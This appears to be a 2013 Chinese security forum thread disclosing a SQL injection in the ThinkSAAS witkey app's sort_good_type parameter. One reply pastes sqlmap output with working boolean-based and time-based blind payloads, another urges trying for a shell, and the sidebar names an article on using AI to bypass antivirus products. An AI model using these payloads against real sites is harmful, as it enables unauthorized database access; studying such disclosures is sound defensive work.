thinksaas

2013-04-08 13:37:07 21 Rices 4601

http://xxxxxxxxxxxxx/index.php?app=witkey&ac=index&sort_industry=&sort_good_type=2[sql]

over

类别 Web安全

关于作者

Rices154篇文章2133篇回复

评论21次

要评论？请先登录或注册

21楼

hang333
2013-4-12 14:48

楼主试试看拿Shell～～

回复|@ta|踩(0)|顶(0)
20楼

a1258771
2013-4-9 19:47

撸主。。。求求求。。。。。。。。。

回复|@ta|踩(0)|顶(0)
19楼

xiaopeng
2013-4-9 19:22

楼主头像才是亮点，，哈哈

回复|@ta|踩(0)|顶(0)
18楼

biying
2013-4-9 15:47

回复|@ta|踩(0)|顶(0)
17楼

kimdle
2013-4-9 14:04

LZ好样的！！！

回复|@ta|踩(0)|顶(0)

16楼

Rank: 1

2013-4-9 11:16

sqlmap跑了下

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: sort_good_type     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND 7672=7672&sort_day=&sort_price=&sort_addtime=      Type: AND/OR time-based blind     Title: MySQL > 5.0.11 AND time-based blind     Payload: app=witkey&ac=index&sort_industry=&sort_good_type=2 AND SLEEP(5)&sort_day=&sort_price=&sort_addtime= ---

回复|@ta|踩(0)|顶(0)

15楼

H4xssck3r
2013-4-9 09:26

简单明了，GOOD

回复|@ta|踩(0)|顶(0)
14楼

csser
2013-4-9 00:02

最直接的0day

回复|@ta|踩(0)|顶(0)
13楼

l14of
2013-4-8 23:58

这个App官网米有。

回复|@ta|踩(0)|顶(0)
12楼

xuehei
2013-4-8 23:00

rices ~~~大牛牛~~一直关注着你·~·

回复|@ta|踩(0)|顶(0)
11楼

XiaoMie
2013-4-8 22:02

文章简洁明了甚是喜欢

回复|@ta|踩(0)|顶(0)
10楼

0xcodede
2013-4-8 20:03

这个很干脆

回复|@ta|踩(0)|顶(0)
9楼

飞云小哥哥
2013-4-8 18:10

撸主v5

回复|@ta|踩(0)|顶(0)
8楼

M3loee
2013-4-8 17:24

呆b

回复|@ta|踩(0)|顶(0)
7楼

牧童
2013-4-8 15:59

嘿，Rices大牛发火了，后果很严重~~~~~~~

回复|@ta|踩(0)|顶(0)
6楼

爱绱hack
2013-4-8 15:49

撸过咯！　顶起

回复|@ta|踩(0)|顶(0)
5楼

nowake
2013-4-8 15:22

挖洞比赛。。。

回复|@ta|踩(0)|顶(0)
4楼

package
2013-4-8 14:38

你惹到 Rices牛了

回复|@ta|踩(0)|顶(0)
3楼

Rices
2013-4-8 14:23

艹你爹.

回复|@ta|踩(0)|顶(0)
2楼

M3loee
2013-4-8 14:22

撸主对wy一往情深有木有，都用来做头像了

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯MongoDB 存在严重未经身份验证的漏洞，可通过 zlib 压缩泄露敏感数据

漏洞通报：MongoDB 严重安全漏洞 (CVE-2025-14847)一个编号为 CV ...

2025-12-25 10:06:03 6 1000

安全资讯专访simeon：攻防深处，薪火相传【T00ls人物专访第二十期】

### 自我介绍simeon，前阿里巴巴集团安全部高级安全专家，曾就职 ...

2025-12-05 10:07:40 13 2125

代码学习利用ai绕过某绒、某60

# 利用ai绕过某绒、某60前言：ai的时代已经贯彻我们的生活了，不 ...

2025-10-13 00:41:30 92 4623

安全资讯破局者河图：专攻“疑难杂症”的实战派创业逻辑【T00ls人物专访第二十一期】

>追风赶月莫停留，平芜尽处是春山 ### 自我介绍我是河图，香港墨 ...

2025-12-19 14:59:28 10 1206

渗透测试对抗前端反调试：编译免疫无限debugger的Chromium浏览器

## 前言最近在测试某系统的时候，发现瑞数好像最近又升级了，以 ...

2025-10-24 19:55:16 26 2830

精华推荐

Web安全『代码审计』从零开始的 Yii2 框架学习之旅（2）

---> 日期：2023-02-15>> 作者：Obsidian>> 介绍：Yii2 框架相关 ...

2023-02-15 16:15:34 7 871

渗透测试1.6K主机全域沦陷实录：从单点突破到域控接管的终极横向渗透链

声明一下：如果您在读文章的时候，图片与描述不符，或者不对的地 ...

2025-04-05 08:52:04 56 1977

渗透测试强制通过VPN上网,VPN断线就断网

论坛里讲怎么攻击的多，之前看有个帖子回复里有人提到这个，很多 ...

2017-03-19 12:26:02 97 4535

逆向破解某VPN客户端远程下载文件执行模拟逆向分析

# 某VPN客户端远程下载文件执行模拟逆向分析## 前言2021年3月， ...

2022-08-29 10:04:23 60 2736

Web安全DedeCMS最新通杀注入之二(buy_action.php)漏洞分析(更新附exp）

0x01、前言前两天，乌云白帽子提交了两个DedeCMS的通杀注入漏洞 ...

2014-03-01 02:01:54 22 686

Top ↑